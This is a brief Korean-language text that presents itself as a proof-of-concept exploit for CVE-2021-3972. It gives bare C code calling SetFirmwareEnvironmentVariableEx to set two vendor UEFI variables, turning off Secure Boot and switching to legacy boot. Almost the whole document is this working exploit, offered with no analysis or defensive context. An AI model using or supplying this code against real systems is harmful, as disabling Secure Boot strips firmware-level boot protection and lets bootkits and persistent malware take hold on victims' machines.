
CVE-2021-3972에 대한 개념 증명 익스플로잇으로, UEFI 펌웨어 변수 조작을 통해 Secure Boot를 비활성화하고 레거시 부팅 설정을 변경하는 방법을 시연합니다.
다른 것 없이 poc 코드
BYTE value = 0x1;
SetFirmwareEnvironmentVariableEx(_T("ChgBootSecureBootDisable"),_T("{6ACCE65D-DA35-4B39-B64B-5ED927A7DC7E}"),&value,sizeof(BYTE),0x7);
SetFirmwareEnvironmentVariableEx(_T("ChgBootChangeLegacy"),_T("{6ACCE65D-DA35-4B39-B64B-5ED927A7DC7E}"),&value,sizeof(BYTE),0x7);